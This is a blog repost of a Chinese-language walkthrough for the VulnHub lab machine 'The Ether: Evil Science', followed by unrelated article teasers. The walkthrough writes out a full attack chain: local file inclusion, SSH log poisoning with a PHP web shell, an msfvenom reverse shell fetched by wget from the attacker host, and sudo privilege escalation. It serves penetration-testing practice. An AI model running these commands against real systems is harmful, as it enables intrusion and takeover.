【vulnhub】The Ether: Evil Science靶机

devtools/2024/9/22 20:19:33/

靶机安装

下载地址:https://www.vulnhub.com/entry/the-ether-evilscience-v101,212/

运行环境:Vmware

信息收集

进行IP发现

nmap 192.168.93.0/24

进行端口扫描,开放了80和22端口

nmap -A 192.168.93.155 -p-

进行目录扫描

dirsearch -u http://192.168.93.155 -e *.php

网页访问IP网址

点击各处之后,发下在点击上面的ABOUT US之后,url里有着请求参数:/index.php?file=about.php

可能存在文件包含漏洞

拼接目录扫描出的目录,没有什么有用的信息,

对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破

标记之后,加入文件包含可能存在的文件的字典

/usr/local/apache2/logs/access_log 
/logs/access_log 
/etc/httpd/logs/access_log 
/var/log/httpd/access_log
/var/log/auth.log

发现有一个/var/log/auth.log目录存在重定向,打开响应包,里面是日志记录,并且是ssh的记录,应该是会把ssh操作记录到这里面,我们尝试利用ssh写入一句话木马,

利用ssh登录产生错误日志写入一句话木马

ssh '<?php @system($_GET[cmd]);?>'@192.168.93.155

访问执行命令

获取shell

用msfvenom生成 shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.93.130 LPORT=1234 -f elf > shell.elf

开启监听

#开启环境
msfconsoleuse exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.93.130
set lport 1234
run

在下载的shell.elf文件下面开启web服务,进行远程下载

python3 -m http.server

利用前面的漏洞执行远程下载和运行,将下面的每条命令在网页里拼接在URL参数后面,回车执行就可以,继续下一条命令

/?file=/var/log/auth.log&d1no=system('wget+192.168.93.130:8000/shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

三条命令执行完之后,发现监听成功

提权

先将获取到的shell转变为交互式的shell

#进入shell环境
shellpython -c 'import pty;pty.spawn("/bin/bash")'

查询一下sudo提权

sudo -l

发现xxxlogauditorxxx.py 可以以 root 运行。

执行命令

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami


http://www.ppmy.cn/devtools/88361.html

相关文章

SQL进阶技巧:Hive URL解析函数详解及实际应用

目 录 0 实际业务需求 1 URL的基本组成 2 PROTOCOL 协议 3 Hive中的URL解析函数 3.1 数据准备 3.2 创建数据库 3.3 需求 3.3.1 parse_url 讲解 3.3.2 测试 3.3.3 实现需求 3.3.4 注意问题 3.5 parse_url_tuple 3.5.1 需求 3.5.2 实现需求 3.5.3 注意问题 4 小…

Redis系列之Redis Sentinel

概述 Redis主从集群&#xff0c;一主多从模式&#xff0c;包括一个Master节点和多个Slave节点。Master负责数据的读写&#xff0c;Slave节点负责数据的查询。Master上收到的数据变更&#xff0c;会同步到Slave节点上实现数据的同步。通过这种架构实现可以Redis的读写分离&…

nginx负载均衡及软件平滑升级!!!

一、负载均衡 早期的网站流量和业务功能都比较简单&#xff0c;单台服务器足以满足基本的需求&#xff0c;但是随着互联网的发展&#xff0c;业务流量越来越大并且业务逻辑也跟着越来越复杂&#xff0c;单台服务器的性能及单点故障问题就凸显出来了&#xff0c;因此需要多台服…

频率的工程测量01 - Rif算法的构造

1.原始文档 《用于正弦波频率估计的修正I-Rife算法》&#xff0c;王哲文&#xff0c;2024 DOI&#xff1a; 10. 16337/j. 1004‑9037. 2024. 02. 019 1.1 这篇论文所属的自科基金U21A20500&#xff1a;近5年所承担的重要科研项目表-智能感知系统与安全教育部重点实验室&#…

vue3+vite全局引入less变量和函数

需要在vite配置 plugins: [css: {preprocessorOptions: {less: {additionalData: import "./src/styles/variables.module.less"; import "./src/views/Visualization/component/ViewportCom/px2viewport.less";,javascriptEnabled: true}}}, ]多个文件按…

校园水电费管理小程序的设计

管理员账户功能包括&#xff1a;系统首页&#xff0c;个人中心&#xff0c;学生管理&#xff0c;教师管理&#xff0c;宿舍信息管理&#xff0c;学生缴费管理&#xff0c;教师缴费管理&#xff0c;系统管理 微信端账号功能包括&#xff1a;系统首页&#xff0c;我的 开发系统…

主动学习实现领域自适应语义分割

领域自适应语义分割是指在一个领域上训练的语义分割模型能够有效地应用到另一个不同但相关的领域。主动学习是通过智能选择最有价值的数据进行标注&#xff0c;以提高模型的性能和效率。将这两者结合起来&#xff0c;可以实现高效的领域自适应语义分割。 以下是实现主动学习和…

Go语言中获取tls中的KeyLogFile,用于dubug

文章目录 获取KeyLogFile示例代码&#xff1a;1. client2. client3. 效果 获取KeyLogFile tls.config自带了接口&#xff0c;所以配置的时候只需要打开就行&#xff0c;以客户端为例 keylogfile 是一个 io.Writer 开了这个就自动使用了 keyLogFile, _ : os.OpenFile(keyLogFi…